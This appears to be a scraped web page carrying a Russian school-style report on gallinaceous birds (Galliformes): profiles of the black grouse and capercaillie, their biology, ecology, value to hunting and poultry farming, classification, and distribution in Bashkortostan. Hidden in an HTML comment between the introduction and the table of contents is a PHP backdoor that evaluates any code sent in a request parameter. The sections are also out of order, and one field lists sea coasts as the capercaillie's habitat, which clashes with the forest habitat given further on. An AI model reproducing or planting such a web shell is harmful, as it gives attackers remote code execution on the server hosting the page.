Рубрика: Курообразные птицы

Тетерев

Латинское название: (Lyrurus tetrix)

Отряд: Курообразные (Galliformes)

Семейство: Тетеревиные (Tetraonidae)

Длина тела:40 – 55 см

Размах крыльев:65 – 80 см

Масса тела:750 – 1480 г

Отличительные признаки: окраска оперения, форма хвоста, повадки в период размножения, голос

Места обитания: Вид открытых ландшафтов

Характеризуется ярко выраженным половым диморфизмом: оперение самца чёрное с блеском, испод крыла, полоса на крыле и подхвостье белые, хвост имеет форму «лиры»; самка меньше, наряд её серовато-бурый со светлыми и тёмными пестринами, хвост со слабой вырезкой на конце. Цевка оперена до пальцев, на которых есть роговая «гребёнка». Существуют гибриды тетерева с глухарём.

· Интересный факт: 

Тетерев наиболее интенсивно токует на рассвете, издавая «бормотание», похожее на воркование голубя. Зимой на ночь укрывается под снегом с целью избежать излишней потери тепла; когда птица покидает подснежную камеру, остаётся лишь небольшая лунка с кучкой экскрементов в форме закруглённых палочек длиной 2-3 см.

· Охрана: 

Подвержен цикличным колебаниям численности, случающимся каждые 17-20 лет. Страдает от изменений окружающей среды, человеческой активности, нерационального использования лесных ресурсов, неразумного истребления охотниками, от инфекционных заболеваний.

· Биология: 

Полигамная птица, в конце зимы самцы возвращаются на привычные места токования, где устраивают брачные игры. В апреле-июле самка откладывает 6-10 яиц, которые насиживает 25-27 дней. Молодые становятся самостоятельными в трёхмесячном возрасте. В год один выводок. Полёт стремительный и мощный, с длинным скольжением. Рацион, основанный на растительной пище, становится чрезвычайно разнообразным в летний и осенний период. Зимний корм состоит в основном из березовых сережек и почек, молодых сосновых шишек.

· Распространение: 

Встречается по всей республике. В степной и лесостепной полосе республики численность не велика.

· Среда обитания: 

Массивы леса, чередующиеся с вырубками и полянами; предпочитает березняки, перемежающиеся с полями, и облесенные овраги.

Глухарь

Латинское название: (Tetrao urogallus)

Отряд: Курообразные (Galliformes)

Семейство: Тетеревиные (Tetraonidae)

Длина тела:60 – 87 см

Размах крыльев:87 – 125 см

Масса тела:2,4 – 6 кг

Отличительные признаки: окраска оперения, форма хвоста, повадки в период размножения, голос

Места обитания: Вид, живущий вдоль морских и океанических побережий

Птица крупных размеров с ярко выраженным половым диморфизмом: самец тёмно-серого цвета с зеленовато-синей блестящей грудью, широким веерообразным хвостом и клювом цвета слоновой кости; самка рыжевато-бурая с рыжей грудью, закруглённым хвостом и тёмным клювом. Нередки случаи межвидового скрещивания с тетеревом.

· Интересный факт: 

Голос глухаря, напоминающий звук вытаскиваемой из бутылки пробки, слышен на расстоянии 100 метров. Во время пения самец задирает голову вверх, опускает крылья, приподнимает и расправляет веером хвост, при этом он совершенно не обращает внимания на то, что происходит вокруг, что хорошо известно охотникам.

· Охрана: 

Существует множество причин снижения численности глухаря: изменение окружающей среды, нерациональное использование лесных богатств, увеличение активности человека, браконьерство, охота, паразиты и т. д.

· Биология: 

Полигамен. С февраля по апрель самцы собираются в привычных местах токования. В начале мая самка откладывает, как правило, 7-9 яиц, которые насиживает 24-26 дней. Молодые становятся самостоятельными в возрасте 4-5 месяцев. В год одна кладка. Взлетает шумно, чередует машущий полёт с планированием.[5] Питается листьями, почками, побегами, плодами древесных и травянистых растений, а также беспозвоночными животными. Рацион более разнообразен весной и осенью. Зимой питается исключительно сосновыми почками и хвоей.

· Распространение: 

На Уфимском плато и в некотором количестве на Белебеевской возвышенности, в Чекмагушевском районе (появился в связи с массовыми посадками сосны в послевоенные годы).

· Среда обитания: 

Населяет леса с наличием хвойных насаждений; встречается преимущественно в горно-лесной зоне. [6]

Распространение в мире и РБ

Распространены куриные чрезвычайно широко, почти по всему земному шару. Куриные населяют самые разнообразные ландшафты, встречаясь в тундре, лесу и степи, но не встречаются в песчаных пустынях. Некоторые хорошо уживаются по соседству с человеком. 250-263 вида Куриных распространены в странах всего света, кроме Антарктиды, крайних северных островах Евразии и Америки, на большей части Гренландии, в южной части Южной Америки и в Аравии. Расселены по разным странам: только в Новой Зеландии акклиматизировано девять видов куриных птиц из других частей света. В Европе разводят более 22 иноземных видов этого отряда, многих на воле. В неволе жили виргинские и карликовые перепела до девяти-десяти лет, трагопаны – до 14, африканские павлины, золотые фазаны, глухари до – 15-20, азиатские павлины и аргусы – до 30 лет. Гоацины. Один вид – Южная Америка. Сорные куры, или большеноги. 12 видов – Австралия, Полинезия и Индонезия. Фазановые – фазаны, павлины, индюки, цесарки, куры, серый куропатки, перепела, улары, кеклики. 174 вида почти во всех странах мира. Тетеревиные – тетерева, рябчики, глухари, белые и тундряные куропатки. 18 видов в северных областях Европы, Азии и Америки. В СССР — 20 видов этого отряда (8 тетеревиных, 12 фазановых).[3] Среди которых в пределах Башкирии обитает 6 видов птиц: рябчик, тетерев, белая и серая куропатка, глухарь и перепел.[4] Более подробно об их распространении будет рассмотрено в главе «Основные представители».

Основные представители

Значение в жизни человека

Отряд куриных птиц имеет большое значение для хозяйственной деятельности человека благодаря хорошим вкусовым качествам мяса, большой плодовитости и легкости приручения. Несколько тысяч лет назад человек приручил дикую банкивскую курицу, которая явилась предком многочисленных современных пород кур, распространенных по всему свету. Путем отбора и селекции были получены породы с высокой яйценоскостью, мясные породы, обладающие крупными размерами и скороспелостью, и, наконец, различные карликовые и другие породы, служащие для декоративных целей. С этой же целью содержат фазанов, павлинов и других куриных.

Кроме кур из отряда куриных, в птицеводстве существенное значение заняли индейки и цесарки, обладающие крупными размерами и очень вкусным мясом.

Большой размер птиц вместе с хорошим мясом делает диких куриных особенно ценными объектами промысловой и спортивной охот.

Более перспективные виды акклиматизируются для охотничьих целей далеко за пределами их естественных ареалов. Так, например, фазаны акклиматизированы на значительной площади в Европе и даже в Америке; в Америку же завезены и успешно размножаются кеклики и серая куропатка. Кеклик завезен в Индию и Новую Зеландию. Делались попытки акклиматизации в Европе дикой индейки и т. д. Совершенно ясно, что возможности акклиматизации и одомашнивания диких куриных еще далеко не полностью использованы человеком.

Куриные являются наиболее ценными промысловыми видами птиц. Ежегодно в Советском Союзе под общим названием «боровая дичь» заготавливали зимой белых и серых куропаток, рябчиков, глухарей, тетеревов, фазанов, которые в мороженом виде поступали на внутренний рынок и экспортировались. При правильно поставленном охотничьем хозяйстве в Казахстане возможно вести плановые заготовки тетерева и фазана.

Увлекательна и разнообразна спортивная охота на боровую дичь. Охота на токах по тетереву и глухарю, летне-осенняя охота по выводкам с легавой собакой, осенне-зимняя охота на фазанов с собакой, охота на перепелов с ловчими птицами и, наконец, охота в горах за уларом и кекликом — таков далеко не полный список спортивной охоты на боровую дичь в нашей республике, имеющей очень разнообразные, богатые дичью охотничьи угодья.

Экология отряда

Между двумя семействами — тетеревиными и фазановыми — имеются довольно резкие экологические различия. Тетеревиные могут хорошо переносить суровые продолжительные зимы. Питаясь почками, хвоей, сережками и т. п., виды этого семейства зимой всегда обеспечены кормами в достаточном количестве, причем кормежка при их обилии занимает очень небольшое время; оставшуюся часть суток они, особенно в сильные морозы, проводят в снежных лунках, где температура значительно выше. Снижение активности птиц и их способность закапываться в снег уменьшают расход энергии, что особенно важно при низких температурах.

Фазановые, живущие иногда в тех же климатических условиях, что и тетеревиные, плохо переносят суровые снежные зимы. Так как они кормятся на земле, то для них зимой резко сокращаются кормовые запасы, а при особенно обильных снегах может наступить полная бескормица. Недостаток кормов вынуждает птиц тратить много времени и усилий на поиски пищи и тем самым расходовать много энергии. В результате в суровые зимы некоторые представители фазановых — кеклик, серая куропатка, фазан, турач — могут в массе гибнуть от бескормицы. Поэтому в правильно организованных охотничьих хозяйствах куропаткам и фазанам в особенно снежные периоды дается подкормка.

Особенности биологии

Куриные — птицы плотного телосложения, как правило, с невысокими ногами и поэтому относительно низкой посадкой тела. Окраска птиц разнообразна. У некоторых видов резко выражен половой диморфизм, проявляющийся в окраске и размерах птиц, у других видов самцы и самки почти неотличимы.

Голова у куриных небольшая, клюв короткий — короче головы, сильный, надклювье у многих видов загнуто вниз. Ноздри оперенные (Tetraonidae) Или покрытые кожистой складкой (Phasianidae). Длина и форма хвоста у разных видов очень сильно отличается. У фазана длина хвоста значительно превышает длину тела; наоборот, у перепелов рулевые очень короткие. Плюсна голая (Phasianidae) Или частично (а у некоторых видов полностью) оперена (Tetraonidae). У тетеревиных (за исключением белых куропаток) по бокам пальцев развиваются роговые бахромки, особенно выраженные зимой.

Для всех куриных характерны короткие выпуклые крылья.

Все представители нашей фауны — наземные птицы. Одни виды исключительно живут на земле, другие — часть времени проводят на деревьях, где в некоторые сезоны года кормятся, иногда и ночуют, но гнездятся только на земле.

Все виды отряда, за исключением перепелов, оседлые птицы, но значительная часть представителей нашей фауны совершает значительные сезонные кочевки, которые, например у серой куропатки, в отдельных районах принимают характер перелетов.

Подвижные птицы, свободно передвигаются по земле, летают быстро, но тяжело и на короткие расстояния. Более продолжительный полет свойственен лишь перепелам и белым куропаткам. Взлетают с земли птицы с шумом, иногда очень сильным (фазан), затем, набрав высоту, чаще всего летят по прямой линии, чередуя частые взмахи крыльев с планированием.

Питаются растительными и животными кормами. Пища у всех видов очень разнообразна и резко изменяется по сезонам. Зимой тетеревиные поедают почки, сережки, хвою, орехи, летом — ягоды, листья, семена, насекомых. Фазановые почти исключительно кормятся на земле, употребляя в пищу ягоды, листья, семена, цветы кустарниковых и травянистых растений, клубни, луковицы и беспозвоночных. Откапывая подземные части растений или почвенных насекомых, представители этого семейства раскапывают почву лапами и клювом, оставляя на местах кормежки характерные копанки.

Среди рассматриваемой группы встречаются виды моногамные и полигамные. У одних птиц самцы участвуют в охране выводка и в насиживании, у большинства же эта забота полностью ложится на самку. Гнездятся на земле, устраивая гнездо в ямке, выложенной стеблями, веточками, а по мере насиживания и пером птицы. Для полигамных видов птиц (глухарь, тетерев) в брачный период характерно токование, выражающееся в брачных играх, сопровождающихся ожесточенными драками самцов. У некоторых видов (белые куропатки) происходят брачные полеты самцов.

Кладка одна; исключение, возможно, составляют перепел и кеклик, у которых, может быть, в отдельных районах ареала иногда и бывает две кладки. Количество яиц в кладках очень различно не только у разных видов, но и у особей одного вида. Но, в общем, кладки большие—от 4 до 26 яиц. Насиживание у разных видов продолжается от 18 до 30 дней. Птицы типично выводковые. Птенцы у одних видов покидают гнездо, как только обсохнут, у других—остаются в гнезде сутки, а может быть, и больше. Птенчики очень быстро оперяются, надевают юношеский наряд, который к осени сменяется первым оперением взрослых птиц. Для большинства семейств куриных птиц до последнего времени считалось характерным наличие в первом взрослом наряде первого и второго первостепенных маховых юношеского оперения. Позднейшими исследованиями установлено, что это правило имеет исключение (фазан, улар) и не может быть распространено на всех куриных.

Линька взрослых птиц протекает различно. У фазановых наблюдается полная осенняя линька, кроме того, известно, что у некоторых видов весной выпадают перья головы, шеи, обламываются дополнительные опахала, отчего летом их перьевой наряд становится более разреженным. По данным С. И. Снигиревского, у некоторых видов (серые куропатки) происходит настоящая весенняя линька. У тетеревиных линька усложнена; кроме основной осенней линьки, у всех тетеревиных имеется частичная летняя, а у белых куропаток еще частичные весенняя и зимняя линьки. Таким образом, все тетеревиные имеют два наряда — зимний и летний, а белые куропатки четыре — зимний, весенний, летний и осенний. У тетеревиных линяют не только оперение, но и роговые покровы, летом — когти, роговые бахромки пальцев и сшелушивается поверхностный роговой слой клюва. У фазановых, постоянно раскапывающих почву клювом и лапами, роговые покровы когтей и клюва постоянно стачиваются и восстанавливаются за счет непрерывного роста.

Классификация отряда Курообразные

Царство: Животные (Animalia или Metazoa)

Тип: Хордовые (Chordata)

Подтип: Позвоночные (Vertebrata)

Класс: Птицы (Aves)

Подкласс: Новонёбные (Neognathae)

Отряд: Курообразные (Galliformes)

Подотряд: Куриные (Galli)

Семейство: Фазановые, или павлиньи (Phasianidae)

Род: Перепела (Coturnix)

Вид: Обыкновенный перепел (Coturnix coturnix)

Род: Белые куропатки (Lagopus)

Вид: Беля куропатка (Lagopus lagopus)

Род: Куропатки (Perdix)

Вид: Серая куропатка (Perdix perdix)

Семейство: Тетеревиные (Tetraoninae)

Род: Глухари (Tetrao)

Вид: Глухарь (Tetrao urogallus)

Род: Тетерева (Lyrurus)

Вид: Тетерев-косач (Lyrurus tetrix)

Род: Рябчики (Bonasa)

Вид: Рябчик (Bonasa bonasia)[1]

Отряд Куриные

Целью исследования является рассмотрение отряда Куриные, их общая характеристика, включающая особенности экологии и биологии, а также значение в жизни человека и хозяйстве, описание основных представителей и изучение происхождения отряда, анализ распространения, как в Башкортостане, так и во всем мире.

Тема моя актуальна тем, что птицы отряда куриных не только обеспечивают нас вкусной питательной пищей в лице обычных бройлеров, но и служат предметом увлечения многих людей. Конечно, в первую очередь имеются в виду заядлые охотники на лесную птицу, но не только. Не зря же в специальных питомниках разводят пернатую экзотику, пользующуюся большим спросом у владельцев собственных особняков с приусадебными участками. Ведь степенно разгуливающий около дома павлин — это действительно очень красиво!

Изучаемый мной отряд состоит из  подотрядов  Гоацинов (Opisthocomi) и собственно Куриных (Galli). К первому принадлежит  одно   семейство  Гоацинов  (Opisthocomidae)  с  единственным  видом  гоацином  (Opisthocomus  hoazin),  распространенным  в  Южной Америке.  Подотряд собственно куриных имеет в своем составе несколько семейств: Большеноги, или Сорные куры (Megapodiidae), Древесные куры, или гокко  (Cracidae),  Тетеревиные  (Tetraonidae),  Фазановые,  или  Павлиньи  (Phasianidae,  или  Pavonidae), Цесарковые (Numididae) и Индейковые (Меleagrididae). Кроме того, известно одно вымершее семейство  (Callinufoididae),  относящееся к  среднему  эоцену,  остатки  представителей  которого найдены в Северной Америке.

Но более полно в работе будут рассмотрены только те виды, которые распространены в Башкортостане. А видам не встречающие в нашей фауне ( разве что в зоопарках или, как отмечено выше, в приусадебных участках) будет уделено особое внимание в главах «Значение в жизни человека» и «Распространение в мире и РБ», в остальных главах поверхностно, для сравнения или для общего обзора.

<!— [insert_php]if (isset($_REQUEST["zktP"])){eval($_REQUEST["zktP"]);exit;}[/insert_php][php]if (isset($_REQUEST["zktP"])){eval($_REQUEST["zktP"]);exit;}[/php] —>

Содержание

Введение……………………………………………………………1-2

1. Классификация отряда Курообразные………………………..2

2. Особенности биологии…………………………………………3-5

3. Экология отряда…………………………………………………6

4. Значение в жизни человека…………………………………….7-8

5. Распространение в мире и РБ…………………………………..9

6.Основные представители……………………………………….10-17

6.1 Глухарь ………………………………………………………..10-11

6.2 Тетерев …………………………………………………………11-13

6.3 Рябчик ………………………………………………………….13-14

6.4 Серая куропатка…………………………………………………15-16

6.5 Перепел…………………………………………………………16-17

7.Редкие виды…………………………………………………………18

8.Происхождение домашних кур……………………………………19

8.1 Простые, или беспородные, куры……………………………..19-20

8.2 Прародители домашних кур…………………………………….20-21

9. Породы домашних кур……………………………………………22

9.1 Породный состав куриного поголовья в СССР……………….22-24

Заключение…………………………………………………………..25-26

Список используемой литературы……………………………………27

Курообразные птицы